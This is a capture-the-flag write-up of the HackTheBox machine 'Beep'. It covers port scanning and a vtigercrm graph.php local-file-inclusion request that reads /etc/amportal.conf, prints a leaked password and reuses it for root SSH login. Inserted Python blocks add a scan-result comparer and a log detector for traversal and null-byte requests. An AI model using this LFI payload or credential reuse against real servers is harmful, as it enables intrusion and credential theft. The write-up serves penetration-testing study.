HacktheBox - Beep Writeup
02/11/2019

Zero to OSCP Hero Writeup #11 - Beep
Reconnaissance
1. Nmap Scan - TCP Scan
Let's start with a TCP scan of the target IP address to determine which ports are open and which services are running on them:
nmap -sC -sV -oA nmap/initial.tcp 10.10.10.7
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -oA: Output the result of the scan in all formats as nmap/initial.tcp

Okay, so there are a few ports open! There are the standard ports common on these boxes, SSH on port 22 and HTTP on port 80, but there also seems to be a mail server on this machine, with the usual mail ports and protocols in use (SMTP, POP3, IMAP etc.), what looks like a Webmin admin login portal on port 10000 and, last but not least, MySQL is also running on the machine.
2. Nmap Scan - All TCP Ports Scan
Okay, let's scan the entire TCP port range to confirm that there are no other ports open:
nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.7
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.tcp
The full TCP scan confirmed that there are no additional ports open.
3. Nmap Scan - All UDP Ports Scan
We can do the same full port scan, but with the UDP ports:
nmap -sU -p- -oA nmap/full.udp 10.10.10.7
- -sU: Run the scan against UDP ports
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan shows several ports open, including TFTP, which is in an open|filtered state (nmap received no response, so it cannot tell whether the port is open or filtered by a firewall).
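The three scans above only answer the question "did the full-range scan find anything the top-1000 scan missed, and which UDP results still need manual confirmation?" if you compare their output. As an added example (not from the writeup, and not a tool the box itself uses), here is a small Python script that parses the grepable .gnmap files nmap -oA writes and performs that comparison. The scan contents are constructed stand-ins for nmap/initial.tcp.gnmap, nmap/full.tcp.gnmap and nmap/full.udp.gnmap, using the ports the writeup names and no version strings; the UDP port 111 entry is constructed filler.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed stand-ins for the .gnmap files nmap -oA writes (assumption: these are
# not the real scan files from the box; ports are the ones the writeup names).
INITIAL_TCP = """# Nmap scan initiated as: nmap -sC -sV -oA nmap/initial.tcp 10.10.10.7
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/open/tcp//pop3///, 143/open/tcp//imap///, 443/open/tcp//https///, 3306/open/tcp//mysql///, 10000/open/tcp//http///\tIgnored State: closed (992)
# Nmap done
"""
# The full-range scan saw the same ports, only the ignored-port count differs.
FULL_TCP = INITIAL_TCP.replace("Ignored State: closed (992)", "Ignored State: closed (65527)")
# Constructed UDP result: TFTP could not be confirmed, one other port answered.
FULL_UDP = """Host: 10.10.10.7 ()\tPorts: 69/open|filtered/udp//tftp///, 111/open/udp//rpcbind///\tIgnored State: closed (65533)
"""

# Each port entry is port/state/protocol/owner/service/rpcinfo/version/; only the
# first three fields matter here.
PORT_RE = re.compile(r"(\d+)/([a-z|]+)/(tcp|udp)/")
PortSet = Set[Tuple[int, str, str]]  # (port, protocol, state)


def parse_gnmap(text: str) -> Dict[str, PortSet]:
    """Collect (port, proto, state) tuples per host from the 'Ports:' lines."""
    hosts: Dict[str, PortSet] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored State", 1)[0]
        for port, state, proto in PORT_RE.findall(ports_field):
            hosts.setdefault(host, set()).add((int(port), proto, state))
    return hosts


def open_ports(scan: Dict[str, PortSet], host: str) -> Set[Tuple[int, str]]:
    """Ports reported open or open|filtered (both deserve follow-up)."""
    return {(p, proto) for p, proto, state in scan.get(host, set()) if state.startswith("open")}


def new_open_ports(baseline: Dict[str, PortSet], full: Dict[str, PortSet], host: str) -> List[Tuple[int, str]]:
    """Ports open in the full-range scan that the top-1000 scan did not report."""
    return sorted(open_ports(full, host) - open_ports(baseline, host))


def uncertain_ports(scan: Dict[str, PortSet], host: str) -> List[Tuple[int, str]]:
    """open|filtered entries: nmap got no reply, so open and filtered look the same."""
    return sorted((p, proto) for p, proto, state in scan.get(host, set()) if state == "open|filtered")


if __name__ == "__main__":
    host = "10.10.10.7"
    initial, full_tcp, full_udp = (parse_gnmap(t) for t in (INITIAL_TCP, FULL_TCP, FULL_UDP))
    print("open in top-1000 TCP scan:", sorted(open_ports(initial, host)))
    print("extra TCP ports in full scan:", new_open_ports(initial, full_tcp, host))
    print("UDP ports needing manual confirmation:", uncertain_ports(full_udp, host))
```

On the real files you would read nmap/initial.tcp.gnmap and the two full-scan files from disk instead of the embedded strings; an empty "extra TCP ports" list is the programmatic version of the sentence "the full TCP scan confirmed that there are no additional ports open".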
Enumeration - Port 80
1. Browse to 10.10.10.7
When we browse to 10.10.10.7 over HTTP, we are redirected to HTTPS on port 443, where a login portal for Elastix is shown.

2. Gobuster
As default credentials don't seem to work on the login panel and there is nothing of note in the page source, let's run gobuster against the web server (over HTTPS, since port 80 redirects there):
gobuster dir -k -u https://10.10.10.7/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
- dir: Indicate that we want to scan for directories
- -k: Skip SSL certificate verification
- -u: URL to scan
- -w: Wordlist to use for the directory search
After looking through some of the more interesting directories, like /config, the directory /vtigercrm catches my eye as it is another login panel.
3. Searchsploit
Again, as default credentials don't work for the /vtigercrm login panel, let's see if searchsploit can point us in a useful direction:
searchsploit elastix

After looking at several of these exploits, the 'graph.php' LFI exploit is the one I want to look into further.
searchsploit -m exploits/php/webapps/37637.pl

So this LFI exploit targets the /vtigercrm directory that gobuster found!
Let's copy the LFI exploit link and see what it returns:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Okay, so this looks a little messy; let's view the page source to make it easier to read!

Bingo! This page lists the default FreePBX database configuration, along with usernames and passwords!
As we can see, the default passwords have been changed to: jEhdIekWmdjE
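The request above works because graph.php uses the current_language parameter to include a file without validating it, so "../" sequences walk out of the web root and the %00 null byte cuts off whatever the script appends. From the defender's side, requests of this shape are easy to spot in web server access logs. As an added example (not from the writeup, and not code from Elastix or vTiger), here is a small Python detector that flags traversal, null bytes and double URL encoding in query parameters. The log lines are constructed: the second carries the exact request shown above, the third is a double-encoded form of the same traversal, and the others are benign.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines (assumption: not logs from the real box;
# line 2 is the request from the writeup, line 3 a double-encoded variant of it).
SAMPLE_LOG = [
    '10.10.14.5 - - [02/Nov/2019:10:01:11 +0000] "GET /vtigercrm/index.php?module=Accounts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [02/Nov/2019:10:02:43 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [02/Nov/2019:10:03:05 +0000] "GET /vtigercrm/graph.php?current_language=%252e%252e%252f%252e%252e%252fetc%252famportal.conf HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [02/Nov/2019:10:04:00 +0000] "GET /config/ HTTP/1.1" 403 210 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." as a whole path component, with either separator
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_fully(value: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Percent-decode until the value stops changing; return (decoded, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_query(target: str) -> List[Tuple[str, List[str]]]:
    """Return (param, indicators) for each query parameter that looks like a file-inclusion attempt."""
    findings = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value, rounds = decode_fully(raw)
        indicators = []
        if TRAVERSAL_RE.search(value):
            indicators.append("path_traversal")
        if "\x00" in value:
            indicators.append("null_byte")  # truncates the path the script builds
        if rounds > 1:
            indicators.append("double_encoding")  # a single-pass decoder would miss the traversal
        if indicators:
            findings.append((name, sorted(indicators)))
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Apply inspect_query to every parsable log line and collect the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, indicators in inspect_query(m["target"]):
            hits.append({
                "src": m["src"], "time": m["ts"], "status": int(m["status"]),
                "path": urlsplit(m["target"]).path, "param": param, "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The status code is kept in each hit on purpose: a traversal request answered with 200, as in the constructed lines, is the one that deserves an incident ticket, while a 403 or 404 is a failed probe. The fix on the application side is the mirror image of the detector: accept only values from a fixed list of language codes and never build an include path from user input.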
Foothold - Root via LFI
After logging into FreePBX with the changed password, there was no luck gaining a foothold via the portal.
1. Logging into Beep via SSH
As SSH was running on the machine, I thought to try the password found in the config file to log in via SSH... and it worked!
ssh root@10.10.10.7
jEhdIekWmdjE

We are root!
whoami && id && hostname

cat root.txt

And through the user fanis, we were able to grab user.txt as well!
cat user.txt

What did I learn from Beep?
I enjoyed this box as it had multiple avenues for exploitation, via the LFI which I used or via port 10000 by utilising a blind payload in the user-agent field.
I think that this box is quite realistic, as I'm sure that the same password is used for multiple accounts of varying permissions, as well as running out-of-date and vulnerable software!
Conclusion
Thanks for reading! Next up is Box #12 - Granny!
